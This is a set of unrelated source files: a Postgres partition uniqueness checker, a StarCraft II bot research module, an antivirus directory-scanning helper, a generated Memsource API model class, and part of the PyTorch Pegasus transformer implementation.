parser = argparse.ArgumentParser(description="This script is used to check that all rows in a partition set are unique for the given columns. Since unique constraints are not applied across partition sets, this cannot be enforced within the database. This script can be used as a monitor to ensure uniqueness. If any unique violations are found, the values, along with a count of each, are output.")
parser.add_argument('-p', '--parent', required=True, help="Parent table of the partition set to be checked")
parser.add_argument('-l', '--column_list', required=True, help="Comma separated list of columns that make up the unique constraint to be checked")
parser.add_argument('-c','--connection', default="host=localhost", help="""Connection string for use by psycopg. Defaults to "host=localhost".""")
parser.add_argument('-t', '--temp', help="Path to a writable folder that can be used for temp working files. Defaults to the system temp folder.")
parser.add_argument('--psql', help="Full path to psql binary if not in current PATH")
parser.add_argument('--simple', action="store_true", help="Output a single integer value with the total duplicate count. Use this for monitoring software that requires a simple value to be checked for.")
parser.add_argument('--index_scan', action="store_true", help="By default index scans are disabled to force the script to check the actual table data with sequential scans. Set this option if you want the script to allow index scans to be used (does not guarantee that they will be used).")
parser.add_argument('-q', '--quiet', action="store_true", help="Suppress all output unless there is a constraint violation found.")
args = parser.parse_args()
if args.temp is None:
tmp_copy_file = tempfile.NamedTemporaryFile(prefix="partman_constraint")
else:
tmp_copy_file = tempfile.NamedTemporaryFile(prefix="partman_constraint", dir=args.temp)
fh = open(tmp_copy_file.name, 'w')
conn = psycopg2.connect(args.connection)
conn.set_session(isolation_level="REPEATABLE READ", readonly=True)
cur = conn.cursor()
if not args.index_scan:
sql = """set enable_bitmapscan = false;
set enable_indexonlyscan = false;
set enable_indexscan = false;
set enable_seqscan = true;"""
else:
sql = """set enable_bitmapscan = true;
set enable_indexonlyscan = true;
set enable_indexscan = true;
set enable_seqscan = false;"""
cur.execute(sql)
cur.close()
cur = conn.cursor()
if not args.quiet:
print("Dumping out column data to temp file...")
cur.copy_to(fh, args.parent, sep=",", columns=args.column_list.split(","))
conn.rollback()
conn.close()
fh.close()
total_count = 0
if not args.quiet:
print("Checking for dupes...")
with open(tmp_copy_file.name) as infile:
counts = collections.Counter(l.strip() for l in infile)
for line, count in counts.most_common():
if count > 1:
if not args.simple:
print(str(line) + ": " + str(count))
total_count += count
if args.simple:
if total_count > 0:
print(total_count)
elif not args.quiet:
print(total_count)
else:
if total_count == 0 and not args.quiet:
print("No constraint violations found")
|
the-stack_106_14764
|
import sc2
from sc2.ids.ability_id import AbilityId
from sc2.constants import *
_debug = False
class Fleet:
def __init__(self, unit):
self.tag = unit.tag
self.unit = unit
self.label = 'Idle'
#research flags.
self._pulse_crystals_researched = False
self._grav_catapult_researched = False
self._pulse_crystals_started = False
self._grav_catapult_started = False
self.current_research = None
async def make_decision(self, game, unit):
self.game = game
self.unit = unit
self.abilities = self.game.allAbilities.get(self.unit.tag)
if self.unit.is_idle:
await self.runList()
else:
self.label = 'Researching {}'.format(self.current_research)
#debugging info
if self.game.debugAllowed:
if _debug or self.unit.is_selected:
self.game._client.debug_text_3d(self.label, self.unit.position3d)
async def runList(self):
#check if we need to mark a research as finished.
self.checkResearched()
#check to see if saving resources are being requested.
if self.resourcesSaved():
self.label = 'Resources being saved'
return
#only build when queues are full to maximize military production
if not self.game._strat_manager.allAllowedQueued:
self.label = 'Building Military Instead'
return
#see if we can research anything.
if self.researchPulseCrystals():
return
#gravcats were removed.
# if self.researchGravCat():
# return
self.label = 'Idle'
def researchPulseCrystals(self):
if self.game.units(PHOENIX).amount >= 3 and not self._pulse_crystals_started and not self._pulse_crystals_researched:
if AbilityId.RESEARCH_PHOENIXANIONPULSECRYSTALS in self.abilities and self.game.can_afford(RESEARCH_PHOENIXANIONPULSECRYSTALS):
self.game.combinedActions.append(self.unit(AbilityId.RESEARCH_PHOENIXANIONPULSECRYSTALS))
self._pulse_crystals_started = True
self.current_research = 'PulseCrystals'
self.game.can_spend = False
return True
def researchGravCat(self):
if self.game.units(CARRIER).amount >= 2 and not self._grav_catapult_started and not self._grav_catapult_researched:
if AbilityId.RESEARCH_INTERCEPTORGRAVITONCATAPULT in self.abilities and self.game.can_afford(RESEARCH_INTERCEPTORGRAVITONCATAPULT):
self.game.combinedActions.append(self.unit(AbilityId.RESEARCH_INTERCEPTORGRAVITONCATAPULT))
self._grav_catapult_started = True
self.current_research = 'GravCat'
self.game.can_spend = False
return True
def checkResearched(self):
if self.current_research:
if self.current_research == 'PulseCrystals':
self._pulse_crystals_researched = True
self._pulse_crystals_started = False
self.current_research = None
elif self.current_research == 'GravCat':
self._grav_catapult_researched = True
self._grav_catapult_started = False
self.current_research = None
def resourcesSaved(self):
if self.game._strat_manager.saving or not self.game.can_spend:
return True
@property
def pulseCrystalsReady(self) -> bool:
return self._pulse_crystals_researched
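# Hedged usage sketch (illustration only; `game` and `unit` stand for the bot's game
# state object and a Fleet Beacon unit supplied by the surrounding bot framework):
#
#   fleet = Fleet(unit)
#   await fleet.make_decision(game, unit)
#   print(fleet.label, fleet.pulseCrystalsReady)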
|
the-stack_106_14765
|
from iemlav.lib.antivirus.antivirus_logger import AntiVirusLogger
import os
class GatherFile(object):
"""GatherFile class."""
def __init__(self, debug=False, path=None):
# Initialize logger
self.logger = AntiVirusLogger(
__name__,
debug=debug
)
        # Initialize the path of the directory to scan
self._PATH = path
def scan_dir(self):
found_files = [] # Initialize empty list of found files
try:
# Iterate through the directory
for root, _, files in os.walk(self._PATH):
for file in files:
found_files.append(os.path.join(root, file))
except Exception as e:
self.logger.log(
"Error occurred: " + str(e),
logtype="error"
)
# Return the list of found files
return found_files
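# Hedged usage sketch (illustration only; the path below is hypothetical):
if __name__ == "__main__":
    gatherer = GatherFile(debug=True, path="/tmp")
    for found_path in gatherer.scan_dir():
        print(found_path)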
|
the-stack_106_14766
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:[email protected]>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from memsource_cli.models.file_dto import FileDto # noqa: F401,E501
class FileListDto(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'files': 'list[FileDto]',
'current_folder': 'str',
'encoded_current_folder': 'str',
'root_folder': 'bool',
'last_changed_files': 'list[FileDto]'
}
attribute_map = {
'files': 'files',
'current_folder': 'currentFolder',
'encoded_current_folder': 'encodedCurrentFolder',
'root_folder': 'rootFolder',
'last_changed_files': 'lastChangedFiles'
}
def __init__(self, files=None, current_folder=None, encoded_current_folder=None, root_folder=None, last_changed_files=None): # noqa: E501
"""FileListDto - a model defined in Swagger""" # noqa: E501
self._files = None
self._current_folder = None
self._encoded_current_folder = None
self._root_folder = None
self._last_changed_files = None
self.discriminator = None
if files is not None:
self.files = files
if current_folder is not None:
self.current_folder = current_folder
if encoded_current_folder is not None:
self.encoded_current_folder = encoded_current_folder
if root_folder is not None:
self.root_folder = root_folder
if last_changed_files is not None:
self.last_changed_files = last_changed_files
@property
def files(self):
"""Gets the files of this FileListDto. # noqa: E501
:return: The files of this FileListDto. # noqa: E501
:rtype: list[FileDto]
"""
return self._files
@files.setter
def files(self, files):
"""Sets the files of this FileListDto.
:param files: The files of this FileListDto. # noqa: E501
:type: list[FileDto]
"""
self._files = files
@property
def current_folder(self):
"""Gets the current_folder of this FileListDto. # noqa: E501
:return: The current_folder of this FileListDto. # noqa: E501
:rtype: str
"""
return self._current_folder
@current_folder.setter
def current_folder(self, current_folder):
"""Sets the current_folder of this FileListDto.
:param current_folder: The current_folder of this FileListDto. # noqa: E501
:type: str
"""
self._current_folder = current_folder
@property
def encoded_current_folder(self):
"""Gets the encoded_current_folder of this FileListDto. # noqa: E501
:return: The encoded_current_folder of this FileListDto. # noqa: E501
:rtype: str
"""
return self._encoded_current_folder
@encoded_current_folder.setter
def encoded_current_folder(self, encoded_current_folder):
"""Sets the encoded_current_folder of this FileListDto.
:param encoded_current_folder: The encoded_current_folder of this FileListDto. # noqa: E501
:type: str
"""
self._encoded_current_folder = encoded_current_folder
@property
def root_folder(self):
"""Gets the root_folder of this FileListDto. # noqa: E501
:return: The root_folder of this FileListDto. # noqa: E501
:rtype: bool
"""
return self._root_folder
@root_folder.setter
def root_folder(self, root_folder):
"""Sets the root_folder of this FileListDto.
:param root_folder: The root_folder of this FileListDto. # noqa: E501
:type: bool
"""
self._root_folder = root_folder
@property
def last_changed_files(self):
"""Gets the last_changed_files of this FileListDto. # noqa: E501
:return: The last_changed_files of this FileListDto. # noqa: E501
:rtype: list[FileDto]
"""
return self._last_changed_files
@last_changed_files.setter
def last_changed_files(self, last_changed_files):
"""Sets the last_changed_files of this FileListDto.
:param last_changed_files: The last_changed_files of this FileListDto. # noqa: E501
:type: list[FileDto]
"""
self._last_changed_files = last_changed_files
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(FileListDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FileListDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
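# Hedged usage sketch (illustration only, not part of the generated model):
if __name__ == "__main__":
    listing = FileListDto(current_folder="docs", root_folder=True)
    print(listing.to_dict())
    # -> {'files': None, 'current_folder': 'docs', 'encoded_current_folder': None,
    #     'root_folder': True, 'last_changed_files': None}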
|
the-stack_106_14768
|
# coding=utf-8
# Copyright 2021, Google and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch PEGASUS model. """
import copy
import math
import random
from typing import Optional, Tuple
import numpy as np
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss
from ...activations import ACT2FN
from ...file_utils import (
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_outputs import (
BaseModelOutput,
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
Seq2SeqLMOutput,
Seq2SeqModelOutput,
)
from ...modeling_utils import PreTrainedModel
from ...utils import logging
from .configuration_pegasus import PegasusConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "google/pegasus-large"
_CONFIG_FOR_DOC = "PegasusConfig"
_TOKENIZER_FOR_DOC = "PegasusTokenizer"
PEGASUS_PRETRAINED_MODEL_ARCHIVE_LIST = [
"google/pegasus-large",
# See all PEGASUS models at https://huggingface.co/models?filter=pegasus
]
# Copied from transformers.models.bart.modeling_bart.shift_tokens_right
def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int):
"""
Shift input ids one token to the right.
"""
shifted_input_ids = input_ids.new_zeros(input_ids.shape)
shifted_input_ids[:, 1:] = input_ids[:, :-1].clone()
shifted_input_ids[:, 0] = decoder_start_token_id
assert pad_token_id is not None, "self.model.config.pad_token_id has to be defined."
# replace possible -100 values in labels by `pad_token_id`
shifted_input_ids.masked_fill_(shifted_input_ids == -100, pad_token_id)
return shifted_input_ids
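# Illustrative sketch (not part of the original module): with pad_token_id=0 and
# decoder_start_token_id=2, shift_tokens_right(torch.tensor([[5, 6, 7]]), 0, 2)
# returns tensor([[2, 5, 6]]) -- each token moves one position to the right and the
# decoder start token is prepended.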
# Copied from transformers.models.bart.modeling_bart._make_causal_mask
def _make_causal_mask(input_ids_shape: torch.Size, dtype: torch.dtype, past_key_values_length: int = 0):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), float("-inf"))
mask_cond = torch.arange(mask.size(-1))
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
if past_key_values_length > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)
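# Illustrative sketch (not part of the original module): for input_ids_shape
# torch.Size([1, 3]) and dtype torch.float32, the returned mask has shape (1, 1, 3, 3),
# with 0 on and below the diagonal and -inf above it, so each position can only attend
# to itself and to earlier positions.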
# Copied from transformers.models.bart.modeling_bart._expand_mask
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):
"""
Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.
"""
bsz, src_len = mask.size()
tgt_len = tgt_len if tgt_len is not None else src_len
expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype)
inverted_mask = 1.0 - expanded_mask
return inverted_mask.masked_fill(inverted_mask.bool(), torch.finfo(dtype).min)
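# Illustrative sketch (not part of the original module): a padding mask of shape
# (batch_size, src_len) holding 1 for real tokens and 0 for padding is expanded to
# (batch_size, 1, tgt_len, src_len); kept positions become 0.0 and padded positions
# become the most negative value representable in `dtype`.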
# Copied from transformers.models.marian.modeling_marian.MarianSinusoidalPositionalEmbedding with Marian->Pegasus
class PegasusSinusoidalPositionalEmbedding(nn.Embedding):
"""This module produces sinusoidal positional embeddings of any length."""
def __init__(self, num_positions: int, embedding_dim: int, padding_idx: Optional[int] = None):
super().__init__(num_positions, embedding_dim)
self.weight = self._init_weight(self.weight)
@staticmethod
def _init_weight(out: nn.Parameter):
"""
Identical to the XLM create_sinusoidal_embeddings except features are not interleaved. The cos features are in
the 2nd half of the vector. [dim // 2:]
"""
n_pos, dim = out.shape
position_enc = np.array(
[[pos / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)] for pos in range(n_pos)]
)
out.requires_grad = False # set early to avoid an error in pytorch-1.8+
sentinel = dim // 2 if dim % 2 == 0 else (dim // 2) + 1
out[:, 0:sentinel] = torch.FloatTensor(np.sin(position_enc[:, 0::2]))
out[:, sentinel:] = torch.FloatTensor(np.cos(position_enc[:, 1::2]))
out.detach_()
return out
@torch.no_grad()
def forward(self, input_ids_shape: torch.Size, past_key_values_length: int = 0):
"""`input_ids_shape` is expected to be [bsz x seqlen]."""
bsz, seq_len = input_ids_shape[:2]
positions = torch.arange(
past_key_values_length, past_key_values_length + seq_len, dtype=torch.long, device=self.weight.device
)
return super().forward(positions)
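# Hedged usage sketch (illustration only, not part of the original module):
#
#   pos_emb = PegasusSinusoidalPositionalEmbedding(num_positions=512, embedding_dim=8)
#   pos_vectors = pos_emb(torch.Size([2, 6]))   # shape (6, 8)
#   # The positional vectors depend only on the sequence positions, so the batch size
#   # does not appear in the output shape.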
# Copied from transformers.models.bart.modeling_bart.BartAttention with Bart->Pegasus
class PegasusAttention(nn.Module):
"""Multi-headed attention from 'Attention Is All You Need' paper"""
def __init__(
self,
embed_dim: int,
num_heads: int,
dropout: float = 0.0,
is_decoder: bool = False,
bias: bool = True,
):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
self.dropout = dropout
self.head_dim = embed_dim // num_heads
assert (
self.head_dim * num_heads == self.embed_dim
), f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {num_heads})."
self.scaling = self.head_dim ** -0.5
self.is_decoder = is_decoder
self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):
return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()
def forward(
self,
hidden_states: torch.Tensor,
key_value_states: Optional[torch.Tensor] = None,
past_key_value: Optional[Tuple[torch.Tensor]] = None,
attention_mask: Optional[torch.Tensor] = None,
layer_head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:
"""Input shape: Batch x Time x Channel"""
# if key_value_states are provided this layer is used as a cross-attention layer
# for the decoder
is_cross_attention = key_value_states is not None
bsz, tgt_len, embed_dim = hidden_states.size()
# get query proj
query_states = self.q_proj(hidden_states) * self.scaling
# get key, value proj
if is_cross_attention and past_key_value is not None:
# reuse k,v, cross_attentions
key_states = past_key_value[0]
value_states = past_key_value[1]
elif is_cross_attention:
# cross_attentions
key_states = self._shape(self.k_proj(key_value_states), -1, bsz)
value_states = self._shape(self.v_proj(key_value_states), -1, bsz)
elif past_key_value is not None:
# reuse k, v, self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
key_states = torch.cat([past_key_value[0], key_states], dim=2)
value_states = torch.cat([past_key_value[1], value_states], dim=2)
else:
# self_attention
key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
if self.is_decoder:
# if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_states, value_states)
proj_shape = (bsz * self.num_heads, -1, self.head_dim)
query_states = self._shape(query_states, tgt_len, bsz).view(*proj_shape)
key_states = key_states.view(*proj_shape)
value_states = value_states.view(*proj_shape)
src_len = key_states.size(1)
attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))
if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len):
raise ValueError(
f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is {attn_weights.size()}"
)
if attention_mask is not None:
if attention_mask.size() != (bsz, 1, tgt_len, src_len):
raise ValueError(
f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}"
)
attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask
attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)
attn_weights = nn.functional.softmax(attn_weights, dim=-1)
if layer_head_mask is not None:
if layer_head_mask.size() != (self.num_heads,):
raise ValueError(
f"Head mask for a single layer should be of size {(self.num_heads,)}, but is {layer_head_mask.size()}"
)
attn_weights = layer_head_mask.view(1, -1, 1, 1) * attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)
if output_attentions:
# this operation is a bit awkward, but it's required to
# make sure that attn_weights keeps its gradient.
# In order to do so, attn_weights have to be reshaped
# twice and have to be reused in the following
attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, tgt_len, src_len)
else:
attn_weights_reshaped = None
attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)
attn_output = torch.bmm(attn_probs, value_states)
if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim):
raise ValueError(
f"`attn_output` should be of size {(bsz, self.num_heads, tgt_len, self.head_dim)}, but is {attn_output.size()}"
)
attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)
attn_output = attn_output.transpose(1, 2)
attn_output = attn_output.reshape(bsz, tgt_len, embed_dim)
attn_output = self.out_proj(attn_output)
return attn_output, attn_weights_reshaped, past_key_value
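# Hedged usage sketch (illustration only, not part of the original module):
#
#   attn = PegasusAttention(embed_dim=16, num_heads=4)
#   hidden = torch.randn(2, 5, 16)                       # (batch, seq_len, embed_dim)
#   attn_out, attn_weights, past_kv = attn(hidden, output_attentions=True)
#   # attn_out: (2, 5, 16); attn_weights: (2, 4, 5, 5); past_kv is None because
#   # is_decoder defaults to False.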
# Copied from transformers.models.mbart.modeling_mbart.MBartEncoderLayer with MBart->Pegasus
class PegasusEncoderLayer(nn.Module):
def __init__(self, config: PegasusConfig):
super().__init__()
self.embed_dim = config.d_model
self.self_attn = PegasusAttention(
embed_dim=self.embed_dim,
num_heads=config.encoder_attention_heads,
dropout=config.attention_dropout,
)
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)
self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: torch.Tensor,
layer_head_mask: torch.Tensor,
output_attentions: bool = False,
):
"""
Args:
hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape `(seq_len, batch, embed_dim)`
attention_mask (:obj:`torch.FloatTensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
"""
residual = hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
hidden_states, attn_weights, _ = self.self_attn(
hidden_states=hidden_states,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
residual = hidden_states
hidden_states = self.final_layer_norm(hidden_states)
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
if hidden_states.dtype == torch.float16 and (
torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any()
):
clamp_value = torch.finfo(hidden_states.dtype).max - 1000
hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value)
outputs = (hidden_states,)
if output_attentions:
outputs += (attn_weights,)
return outputs
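# Hedged usage sketch (illustration only, not part of the original module; the config
# values below are arbitrary small numbers chosen for the example):
#
#   config = PegasusConfig(d_model=16, encoder_attention_heads=4, encoder_ffn_dim=32)
#   layer = PegasusEncoderLayer(config)
#   hidden = torch.randn(2, 5, config.d_model)
#   (hidden_out,) = layer(hidden, attention_mask=None, layer_head_mask=None)
#   # hidden_out keeps the input shape: (2, 5, 16)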
# Copied from transformers.models.mbart.modeling_mbart.MBartDecoderLayer with MBart->Pegasus
class PegasusDecoderLayer(nn.Module):
def __init__(self, config: PegasusConfig):
super().__init__()
self.embed_dim = config.d_model
self.self_attn = PegasusAttention(
embed_dim=self.embed_dim,
num_heads=config.decoder_attention_heads,
dropout=config.attention_dropout,
is_decoder=True,
)
self.dropout = config.dropout
self.activation_fn = ACT2FN[config.activation_function]
self.activation_dropout = config.activation_dropout
self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.encoder_attn = PegasusAttention(
self.embed_dim,
config.decoder_attention_heads,
dropout=config.attention_dropout,
is_decoder=True,
)
self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim)
self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim)
self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim)
self.final_layer_norm = nn.LayerNorm(self.embed_dim)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
layer_head_mask: Optional[torch.Tensor] = None,
cross_attn_layer_head_mask: Optional[torch.Tensor] = None,
past_key_value: Optional[Tuple[torch.Tensor]] = None,
output_attentions: Optional[bool] = False,
use_cache: Optional[bool] = True,
):
"""
Args:
hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape `(seq_len, batch, embed_dim)`
attention_mask (:obj:`torch.FloatTensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
encoder_hidden_states (:obj:`torch.FloatTensor`): cross attention input to the layer of shape `(seq_len, batch, embed_dim)`
encoder_attention_mask (:obj:`torch.FloatTensor`): encoder attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size
`(encoder_attention_heads,)`.
cross_attn_layer_head_mask (:obj:`torch.FloatTensor`): mask for cross-attention heads in a given layer of
size `(decoder_attention_heads,)`.
past_key_value (:obj:`Tuple(torch.FloatTensor)`): cached past key and value projection states
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
"""
residual = hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
# Self Attention
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
# add present self-attn cache to positions 1,2 of present_key_value tuple
hidden_states, self_attn_weights, present_key_value = self.self_attn(
hidden_states=hidden_states,
past_key_value=self_attn_past_key_value,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
# Cross-Attention Block
cross_attn_present_key_value = None
cross_attn_weights = None
if encoder_hidden_states is not None:
residual = hidden_states
hidden_states = self.encoder_attn_layer_norm(hidden_states)
# cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn(
hidden_states=hidden_states,
key_value_states=encoder_hidden_states,
attention_mask=encoder_attention_mask,
layer_head_mask=cross_attn_layer_head_mask,
past_key_value=cross_attn_past_key_value,
output_attentions=output_attentions,
)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
# add cross-attn to positions 3,4 of present_key_value tuple
present_key_value = present_key_value + cross_attn_present_key_value
# Fully Connected
residual = hidden_states
hidden_states = self.final_layer_norm(hidden_states)
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
hidden_states = self.fc2(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = residual + hidden_states
outputs = (hidden_states,)
if output_attentions:
outputs += (self_attn_weights, cross_attn_weights)
if use_cache:
outputs += (present_key_value,)
return outputs
class PegasusPreTrainedModel(PreTrainedModel):
config_class = PegasusConfig
base_model_prefix = "model"
def _init_weights(self, module):
std = self.config.init_std
if isinstance(module, nn.Linear):
module.weight.data.normal_(mean=0.0, std=std)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, PegasusSinusoidalPositionalEmbedding):
pass
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=std)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
PEGASUS_START_DOCSTRING = r"""
    This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic
    methods the library implements for all its models (such as downloading or saving, resizing the input embeddings,
    pruning heads etc.)
This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__
subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to
general usage and behavior.
Parameters:
config (:class:`~transformers.PegasusConfig`):
Model configuration class with all the parameters of the model. Initializing with a config file does not
load the weights associated with the model, only the configuration. Check out the
:meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
PEGASUS_GENERATION_EXAMPLE = r"""
Summarization example::
>>> from transformers import PegasusTokenizer, PegasusForConditionalGeneration
>>> model = PegasusForConditionalGeneration.from_pretrained('google/pegasus-xsum')
>>> tokenizer = PegasusTokenizer.from_pretrained('google/pegasus-xsum')
>>> ARTICLE_TO_SUMMARIZE = (
... "PG&E stated it scheduled the blackouts in response to forecasts for high winds "
... "amid dry conditions. The aim is to reduce the risk of wildfires. Nearly 800 thousand customers were "
... "scheduled to be affected by the shutoffs which were expected to last through at least midday tomorrow."
... )
>>> inputs = tokenizer([ARTICLE_TO_SUMMARIZE], max_length=1024, return_tensors='pt')
>>> # Generate Summary
>>> summary_ids = model.generate(inputs['input_ids'])
>>> print([tokenizer.decode(g, skip_special_tokens=True, clean_up_tokenization_spaces=False) for g in summary_ids])
"""
